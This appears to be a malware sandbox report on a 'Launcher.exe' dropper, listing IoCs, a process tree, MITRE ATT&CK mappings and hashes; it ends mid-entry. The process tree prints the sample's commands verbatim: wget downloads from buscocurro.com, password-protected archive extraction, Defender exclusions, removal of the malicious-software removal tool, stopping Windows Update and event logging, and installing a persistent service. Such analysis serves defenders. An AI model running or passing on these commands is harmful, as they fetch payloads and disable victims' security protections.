c2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exerhjryjyj.exeopenwith.exe2plugin27724powershell.exekuytqawknxye.exepowershell.exedwm.exe

pid	process
4332	powershell.exe
4332	powershell.exe
1968	powershell.exe
1968	powershell.exe
1968	powershell.exe
2704	rhjryjyj.exe
2704	rhjryjyj.exe
5080	openwith.exe
5080	openwith.exe
5080	openwith.exe
5080	openwith.exe
776	2plugin27724
776	2plugin27724
776	2plugin27724
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
776	2plugin27724
776	2plugin27724
776	2plugin27724
776	2plugin27724
776	2plugin27724
776	2plugin27724
776	2plugin27724
776	2plugin27724
776	2plugin27724
776	2plugin27724
776	2plugin27724
776	2plugin27724
776	2plugin27724
776	2plugin27724
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
4336	powershell.exe
4336	powershell.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3764	kuytqawknxye.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe
3756	dwm.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exedwm.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	4332	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeShutdownPrivilege	4396	powercfg.exe
Token: SeCreatePagefilePrivilege	4396	powercfg.exe
Token: SeShutdownPrivilege	1816	powercfg.exe
Token: SeCreatePagefilePrivilege	1816	powercfg.exe
Token: SeShutdownPrivilege	1036	powercfg.exe
Token: SeCreatePagefilePrivilege	1036	powercfg.exe
Token: SeShutdownPrivilege	4468	powercfg.exe
Token: SeCreatePagefilePrivilege	4468	powercfg.exe
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeLockMemoryPrivilege	3756	dwm.exe
Token: SeShutdownPrivilege	1164	powercfg.exe
Token: SeCreatePagefilePrivilege	1164	powercfg.exe
Token: SeShutdownPrivilege	3616	powercfg.exe
Token: SeCreatePagefilePrivilege	3616	powercfg.exe
Token: SeShutdownPrivilege	2820	powercfg.exe
Token: SeCreatePagefilePrivilege	2820	powercfg.exe
Token: SeShutdownPrivilege	2408	powercfg.exe
Token: SeCreatePagefilePrivilege	2408	powercfg.exe

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

wget.exewinrar.exewget.exewinrar.exewget.exewinrar.exe3plugin29563

pid process

4008 wget.exe
776 winrar.exe
776 winrar.exe
848 wget.exe
3040 winrar.exe
3040 winrar.exe
3740 wget.exe
4240 winrar.exe
4240 winrar.exe
1092 3plugin29563

pid	process
4008	wget.exe
776	winrar.exe
776	winrar.exe
848	wget.exe
3040	winrar.exe
3040	winrar.exe
3740	wget.exe
4240	winrar.exe
4240	winrar.exe
1092	3plugin29563

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.exeLaunhcer.exepowershell.exeLauncher.exerhjryjyj.exe3plugin29563cmd.execmd.exekuytqawknxye.exe

description	pid	process	target process
PID 4476 wrote to memory of 2740	4476	Launcher.exe	Launhcer.exe
PID 4476 wrote to memory of 2740	4476	Launcher.exe	Launhcer.exe
PID 4476 wrote to memory of 2740	4476	Launcher.exe	Launhcer.exe
PID 4476 wrote to memory of 2740	4476	Launcher.exe	Launhcer.exe
PID 4476 wrote to memory of 2740	4476	Launcher.exe	Launhcer.exe
PID 2740 wrote to memory of 4332	2740	Launhcer.exe	powershell.exe
PID 2740 wrote to memory of 4332	2740	Launhcer.exe	powershell.exe
PID 2740 wrote to memory of 4332	2740	Launhcer.exe	powershell.exe
PID 4332 wrote to memory of 2124	4332	powershell.exe	Launcher.exe
PID 4332 wrote to memory of 2124	4332	powershell.exe	Launcher.exe
PID 4332 wrote to memory of 2124	4332	powershell.exe	Launcher.exe
PID 4332 wrote to memory of 2124	4332	powershell.exe	Launcher.exe
PID 4332 wrote to memory of 2124	4332	powershell.exe	Launcher.exe
PID 2124 wrote to memory of 1968	2124	Launcher.exe	powershell.exe
PID 2124 wrote to memory of 1968	2124	Launcher.exe	powershell.exe
PID 2124 wrote to memory of 1968	2124	Launcher.exe	powershell.exe
PID 2124 wrote to memory of 4008	2124	Launcher.exe	wget.exe
PID 2124 wrote to memory of 4008	2124	Launcher.exe	wget.exe
PID 2124 wrote to memory of 4008	2124	Launcher.exe	wget.exe
PID 2124 wrote to memory of 776	2124	Launcher.exe	winrar.exe
PID 2124 wrote to memory of 776	2124	Launcher.exe	winrar.exe
PID 2124 wrote to memory of 776	2124	Launcher.exe	winrar.exe
PID 2124 wrote to memory of 2704	2124	Launcher.exe	rhjryjyj.exe
PID 2124 wrote to memory of 2704	2124	Launcher.exe	rhjryjyj.exe
PID 2124 wrote to memory of 2704	2124	Launcher.exe	rhjryjyj.exe
PID 2124 wrote to memory of 848	2124	Launcher.exe	wget.exe
PID 2124 wrote to memory of 848	2124	Launcher.exe	wget.exe
PID 2124 wrote to memory of 848	2124	Launcher.exe	wget.exe
PID 2704 wrote to memory of 5080	2704	rhjryjyj.exe	openwith.exe
PID 2704 wrote to memory of 5080	2704	rhjryjyj.exe	openwith.exe
PID 2704 wrote to memory of 5080	2704	rhjryjyj.exe	openwith.exe
PID 2704 wrote to memory of 5080	2704	rhjryjyj.exe	openwith.exe
PID 2704 wrote to memory of 5080	2704	rhjryjyj.exe	openwith.exe
PID 2124 wrote to memory of 3040	2124	Launcher.exe	winrar.exe
PID 2124 wrote to memory of 3040	2124	Launcher.exe	winrar.exe
PID 2124 wrote to memory of 3040	2124	Launcher.exe	winrar.exe
PID 2124 wrote to memory of 776	2124	Launcher.exe	2plugin27724
PID 2124 wrote to memory of 776	2124	Launcher.exe	2plugin27724
PID 2124 wrote to memory of 3740	2124	Launcher.exe	wget.exe
PID 2124 wrote to memory of 3740	2124	Launcher.exe	wget.exe
PID 2124 wrote to memory of 3740	2124	Launcher.exe	wget.exe
PID 2124 wrote to memory of 4240	2124	Launcher.exe	winrar.exe
PID 2124 wrote to memory of 4240	2124	Launcher.exe	winrar.exe
PID 2124 wrote to memory of 4240	2124	Launcher.exe	winrar.exe
PID 2124 wrote to memory of 1092	2124	Launcher.exe	3plugin29563
PID 2124 wrote to memory of 1092	2124	Launcher.exe	3plugin29563
PID 2124 wrote to memory of 1092	2124	Launcher.exe	3plugin29563
PID 1092 wrote to memory of 4852	1092	3plugin29563	Hkbsse.exe
PID 1092 wrote to memory of 4852	1092	3plugin29563	Hkbsse.exe
PID 1092 wrote to memory of 4852	1092	3plugin29563	Hkbsse.exe
PID 5092 wrote to memory of 4600	5092	cmd.exe	wusa.exe
PID 5092 wrote to memory of 4600	5092	cmd.exe	wusa.exe
PID 2124 wrote to memory of 1136	2124	Launcher.exe	cmd.exe
PID 2124 wrote to memory of 1136	2124	Launcher.exe	cmd.exe
PID 2124 wrote to memory of 1136	2124	Launcher.exe	cmd.exe
PID 4560 wrote to memory of 1616	4560	cmd.exe	wusa.exe
PID 4560 wrote to memory of 1616	4560	cmd.exe	wusa.exe
PID 3764 wrote to memory of 1660	3764	kuytqawknxye.exe	conhost.exe
PID 3764 wrote to memory of 1660	3764	kuytqawknxye.exe	conhost.exe
PID 3764 wrote to memory of 1660	3764	kuytqawknxye.exe	conhost.exe
PID 3764 wrote to memory of 1660	3764	kuytqawknxye.exe	conhost.exe
PID 3764 wrote to memory of 1660	3764	kuytqawknxye.exe	conhost.exe
PID 3764 wrote to memory of 1660	3764	kuytqawknxye.exe	conhost.exe
PID 3764 wrote to memory of 1660	3764	kuytqawknxye.exe	conhost.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2664
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:5080

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4476
- C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
  "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4332
  - - C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
      "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2124
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1968
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:4008
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01*.* "1\*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:776
    - - C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe
        
        "C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2704
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 616
        6⤵
        Program crash
        
        PID:4316
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:848
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:3040
    - - C:\Users\Admin\AppData\Roaming\services\2plugin27724
        
        C:\Users\Admin\AppData\Roaming\services\2plugin27724
        5⤵
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:776
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3056
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:5092
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:4600
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:3468
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:4980
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:3228
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:3560
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:692
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4396
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1036
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1816
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4468
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "OZLCSUZD"
        6⤵
        Launches sc.exe
        
        PID:3760
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:1112
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:2176
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "OZLCSUZD"
        6⤵
        Launches sc.exe
        
        PID:3528
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:3740
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:4240
    - - C:\Users\Admin\AppData\Roaming\services\3plugin29563
        
        C:\Users\Admin\AppData\Roaming\services\3plugin29563
        5⤵
        Checks computer location settings
        Drops file in Windows directory
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1092
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 864
        6⤵
        Program crash
        
        PID:1836
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 900
        6⤵
        Program crash
        
        PID:1764
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 920
        6⤵
        Program crash
        
        PID:1276
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 1036
        6⤵
        Program crash
        
        PID:4796
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 1032
        6⤵
        Program crash
        
        PID:3280
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 1052
        6⤵
        Program crash
        
        PID:2236
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 1248
        6⤵
        Program crash
        
        PID:4820
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 1232
        6⤵
        Program crash
        
        PID:5112
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 1328
        6⤵
        Program crash
        
        PID:4448
      - C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4852
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 684
        7⤵
        Program crash
        
        PID:3024
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 692
        7⤵
        Program crash
        
        PID:1020
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 724
        7⤵
        Program crash
        
        PID:400
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 688
        7⤵
        Program crash
        
        PID:4468
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 928
        7⤵
        Program crash
        
        PID:2704
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 688
        7⤵
        Program crash
        
        PID:3320
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 984
        7⤵
        Program crash
        
        PID:3520
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 1048
        7⤵
        Program crash
        
        PID:4008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 1196
        7⤵
        Program crash
        
        PID:1504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 1396
        7⤵
        Program crash
        
        PID:4708
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 1396
        6⤵
        Program crash
        
        PID:2732
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2704 -ip 2704
1⤵
PID:1428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1092 -ip 1092
1⤵
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1092 -ip 1092
1⤵
PID:2532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1092 -ip 1092
1⤵
PID:1144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1092 -ip 1092
1⤵
PID:1208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1092 -ip 1092
1⤵
PID:3292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1092 -ip 1092
1⤵
PID:2852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1092 -ip 1092
1⤵
PID:3744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1092 -ip 1092
1⤵
PID:544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1092 -ip 1092
1⤵
PID:2540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1092 -ip 1092
1⤵
PID:928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4852 -ip 4852
1⤵
PID:2136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4852 -ip 4852
1⤵
PID:668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4852 -ip 4852
1⤵
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4852 -ip 4852
1⤵
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4852 -ip 4852
1⤵
PID:444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4852 -ip 4852
1⤵
PID:2116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4852 -ip 4852
1⤵
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4852 -ip 4852
1⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4852 -ip 4852
1⤵
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4852 -ip 4852
1⤵
PID:1276

C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
1⤵
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3764
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4560
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1616
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4724
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3692
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4588
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2640
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4084
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3616
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2408
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1660
- C:\Windows\system32\dwm.exe
  dwm.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3756

C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:824
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 824 -s 432
  2⤵
  - Program crash
  PID:2516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 824 -ip 824
1⤵
PID:3184

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
